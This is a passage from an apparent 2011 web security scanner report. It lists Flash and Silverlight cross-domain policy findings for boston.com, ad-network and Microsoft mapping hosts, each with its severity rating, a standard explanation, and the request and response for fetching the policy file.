Last-Modified: Mon, 17 Aug 2009 15:11:15 GMT
ETag: "86335a-4b6-47157d029df7f"
Accept-Ranges: bytes
Served-By: alechill
Age: 1196
Cache-Control: max-age=3600
Via: HTTP/1.1 cache.boston.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet.
Expires: Tue, 19 Jul 2011 21:23:53 GMT
Via: 1.0 rhv082185010000 (MII-APC/2.0)
x-mii-cache-hit: 1
Content-Length: 1206
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="admin.brightcove.com" />
<allow-access-from domain="boston.com" />
...[SNIP]...
<allow-access-from domain="dev.xif.com" />
<allow-access-from domain="explorenewengland.com" />
<allow-access-from domain="graphics.boston.com" />
<allow-access-from domain="necn.dsys.worldnow.com" />
<allow-access-from domain="necn.dua.worldnow.com" />
<allow-access-from domain="oastest.boston.com" />
<allow-access-from domain="re.boston.com" />
<allow-access-from domain="realestate.boston.com" />
<allow-access-from domain="rmedia.boston.com" />
<allow-access-from domain="video.boston.com" />
<allow-access-from domain="video.necn.com" />
<allow-access-from domain="video.nesn.com" />
<allow-access-from domain="workbench.boston.com" />
<allow-access-from domain="www.boston.com" />
<allow-access-from domain="www.explorenewengland.com" />
<allow-access-from domain="www.private.boston.com" />
<allow-access-from domain="objects.tremormedia.com" />
...[SNIP]...

5.78. http://rmedia.boston.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rmedia.boston.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: rmedia.boston.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:03 GMT
Server: Apache
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Tue, 19 Oct 2010 20:25:47 GMT
ETag: "4302db-51e-191508c0"
Accept-Ranges: bytes
Content-Length: 1310
Keep-Alive: timeout=300, max=114
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="admin.brightcove.com" />
<allow-access-from domain="boston.com" />
<allow-access-from domain="cache.boston.com" />
<allow-access-from domain="cachelection.boston.com" />
<allow-access-from domain="dev.xif.com" />
<allow-access-from domain="explorenewengland.com" />
<allow-access-from domain="graphics.boston.com" />
<allow-access-from domain="necn.dsys.worldnow.com" />
<allow-access-from domain="necn.dua.worldnow.com" />
<allow-access-from domain="oastest.boston.com" />
<allow-access-from domain="re.boston.com" />
...[SNIP]...
<allow-access-from domain="video.boston.com" />
<allow-access-from domain="video.necn.com" />
<allow-access-from domain="video.nesn.com" />
<allow-access-from domain="workbench.boston.com" />
<allow-access-from domain="realestate.boston.com" />
<allow-access-from domain="www.boston.com" />
<allow-access-from domain="www.explorenewengland.com" />
<allow-access-from domain="www.private.boston.com" />
<allow-access-from domain="objects.tremormedia.com" />
<allow-access-from domain="redir.adap.tv" />
...[SNIP]...

5.79. http://www.boston.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.boston.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.boston.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:48 GMT
Server: Apache/2.2.13 (Unix) modpath/0.4
Last-Modified: Tue, 19 Oct 2010 20:25:47 GMT
Accept-Ranges: bytes
Content-Length: 1310
Served-By: garrick
Keep-Alive: timeout=30
Connection: close
Content-Type: application/xml
Set-Cookie: bcpage=8;expires=Wed, 22-Jun-2016 20:43:48 GMT;path=/;domain=boston.com;

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="admin.brightcove.com" />
<allow-access-from domain="boston.com" />
<allow-access-from domain="cache.boston.com" />
<allow-access-from domain="cachelection.boston.com" />
<allow-access-from domain="dev.xif.com" />
<allow-access-from domain="explorenewengland.com" />
<allow-access-from domain="graphics.boston.com" />
<allow-access-from domain="necn.dsys.worldnow.com" />
<allow-access-from domain="necn.dua.worldnow.com" />
<allow-access-from domain="oastest.boston.com" />
<allow-access-from domain="re.boston.com" />
<allow-access-from domain="rmedia.boston.com" />
<allow-access-from domain="video.boston.com" />
<allow-access-from domain="video.necn.com" />
<allow-access-from domain="video.nesn.com" />
<allow-access-from domain="workbench.boston.com" />
<allow-access-from domain="realestate.boston.com" />
...[SNIP]...
<allow-access-from domain="www.explorenewengland.com" />
<allow-access-from domain="www.private.boston.com" />
<allow-access-from domain="objects.tremormedia.com" />
<allow-access-from domain="redir.adap.tv" />
...[SNIP]...

6. Silverlight cross-domain policy  previous  next
There are 29 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


6.1. http://ad.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 20:54:04 GMT
Date: Tue, 19 Jul 2011 14:58:32 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

6.2. http://b.scorecardresearch.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 07 Jul 2011 18:29:25 GMT
Content-Type: application/xml
Expires: Wed, 20 Jul 2011 14:26:45 GMT
Date: Tue, 19 Jul 2011 14:26:45 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

6.3. http://c.atdmt.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.atdmt.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: c.atdmt.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Content-Type: text/xml
Last-Modified: Fri, 05 Nov 2010 18:44:56 GMT
Accept-Ranges: bytes
ETag: "044698a197dcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 19 Jul 2011 14:24:25 GMT
Connection: keep-alive
Content-Length: 340

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<g
...[SNIP]...

6.4. http://dev.virtualearth.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dev.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: dev.virtualearth.net

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Last-Modified: Thu, 30 Jun 2011 21:42:15 GMT
Accept-Ranges: bytes
ETag: "98928946e37cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 18:33:46 GMT
Connection: close
Content-Length: 374

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
<domain uri="http://*"/>
...[SNIP]...

6.5. http://ecn.api.tiles.virtualearth.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.api.tiles.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ecn.api.tiles.virtualearth.net

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Last-Modified: Wed, 13 Jul 2011 18:25:34 GMT
Accept-Ranges: bytes
ETag: "89839418a41cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 18:33:41 GMT
Connection: close
Content-Length: 458

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
...[SNIP]...

6.6. http://ecn.dev.virtualearth.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.dev.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ecn.dev.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Last-Modified: Thu, 30 Jun 2011 21:42:15 GMT
Accept-Ranges: bytes
ETag: "98928946e37cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 18:33:43 GMT
Content-Length: 374
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
<domain uri="http://*"/>
...[SNIP]...

6.7. http://ecn.t0.tiles.virtualearth.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t0.tiles.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ecn.t0.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "92f3dd6d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 458
Age: 428798
Date: Tue, 19 Jul 2011 12:24:12 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Expires: Thu, 15 Sep 2011 13:17:34 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
...[SNIP]...

6.8. http://ecn.t1.tiles.virtualearth.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t1.tiles.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ecn.t1.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "92f3dd6d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 458
Age: 426301
Date: Tue, 19 Jul 2011 12:24:10 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Expires: Thu, 15 Sep 2011 13:59:09 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
...[SNIP]...

6.9. http://ecn.t2.tiles.virtualearth.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t2.tiles.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ecn.t2.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "92f3dd6d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 458
Age: 427286
Date: Tue, 19 Jul 2011 12:24:14 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Expires: Thu, 15 Sep 2011 13:42:48 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
...[SNIP]...

6.10. http://ecn.t3.tiles.virtualearth.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t3.tiles.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ecn.t3.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "92f3dd6d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 458
Age: 421084
Date: Tue, 19 Jul 2011 12:24:10 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Expires: Thu, 15 Sep 2011 15:26:06 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
...[SNIP]...

6.11. http://farecastcom.122.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://farecastcom.122.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: farecastcom.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 15:00:28 GMT
Server: Omniture DC/2.0.0
xserver: www334
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

6.12. http://img1.catalog.video.msn.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img1.catalog.video.msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: img1.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Last-Modified: Sat, 21 Aug 2010 01:19:24 GMT
Accept-Ranges: bytes
ETag: "ae9ee4ce40cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 12:23:55 GMT
Content-Length: 433
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>

...[SNIP]...
<domain uri="http://*"/>
...[SNIP]...

6.13. http://img2.catalog.video.msn.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img2.catalog.video.msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: img2.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Last-Modified: Sat, 21 Aug 2010 01:19:24 GMT
Accept-Ranges: bytes
ETag: "ae9ee4ce40cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 12:23:59 GMT
Content-Length: 433
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>

...[SNIP]...
<domain uri="http://*"/>
...[SNIP]...

6.14. http://img3.catalog.video.msn.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img3.catalog.video.msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: img3.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Last-Modified: Sat, 21 Aug 2010 01:19:24 GMT
Accept-Ranges: bytes
ETag: "ae9ee4ce40cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 12:23:56 GMT
Content-Length: 433
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>

...[SNIP]...
<domain uri="http://*"/>
...[SNIP]...

6.15. http://img4.catalog.video.msn.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img4.catalog.video.msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: img4.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Last-Modified: Sat, 21 Aug 2010 01:19:24 GMT
Accept-Ranges: bytes
ETag: "ae9ee4ce40cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 12:23:57 GMT
Content-Length: 433
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>

...[SNIP]...
<domain uri="http://*"/>
...[SNIP]...

6.16. http://metrics.boston.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.boston.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.boston.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:15 GMT
Server: Omniture DC/2.0.0
xserver: www8
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

6.17. http://metrics.ticketmaster.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.ticketmaster.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.ticketmaster.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:41 GMT
Server: Omniture DC/2.0.0
xserver: www416
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

6.18. http://metrics.versionone.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.versionone.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.versionone.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:22:36 GMT
Server: Omniture DC/2.0.0
xserver: www277
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

6.19. http://wa.stubhub.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wa.stubhub.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: wa.stubhub.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:25 GMT
Server: Omniture DC/2.0.0
xserver: www419
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

6.20. http://a1.bing4.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://a1.bing4.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: a1.bing4.com

Response

HTTP/1.0 200 OK
Cache-Control: private,max-age=0
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Tue, 19 Jul 2011 12:23:40 GMT
Content-Length: 1766
Connection: close
Set-Cookie: _SS=SID=ACC9F2D17EA74196BBE197B558762F0B; domain=.bing4.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=E72EC00875854ADDAEF44F551ACC381B; expires=Thu, 18-Jul-2013 12:23:40 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; expires=Thu, 18-Jul-2013 12:23:40 GMT; domain=.bing4.com; path=/

<?xml version="1.0" encoding="utf-8"?>
<!-- FD -->
<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://www.bing.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

6.21. http://a2.bing4.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://a2.bing4.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: a2.bing4.com

Response

HTTP/1.0 200 OK
Cache-Control: private,max-age=0
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Tue, 19 Jul 2011 12:23:43 GMT
Content-Length: 1766
Connection: close
Set-Cookie: _SS=SID=FD84A860CA4F429FA89BA7D404B5A201; domain=.bing4.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=FB57DCBA77094F5D84B5629ECCBB9DB2; expires=Thu, 18-Jul-2013 12:23:43 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; expires=Thu, 18-Jul-2013 12:23:43 GMT; domain=.bing4.com; path=/

<?xml version="1.0" encoding="utf-8"?>
<!-- FD -->
<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://www.bing.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

6.22. http://a3.bing4.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://a3.bing4.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: a3.bing4.com

Response

HTTP/1.0 200 OK
Cache-Control: private,max-age=0
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Tue, 19 Jul 2011 12:23:50 GMT
Content-Length: 1766
Connection: close
Set-Cookie: _SS=SID=0E1782A1AE7D45E782E0CB84B3629234; domain=.bing4.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=A556F0A2559B466DAABCC17A7CE2BA9D; expires=Thu, 18-Jul-2013 12:23:50 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; expires=Thu, 18-Jul-2013 12:23:50 GMT; domain=.bing4.com; path=/

<?xml version="1.0" encoding="utf-8"?>
<!-- FD -->
<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
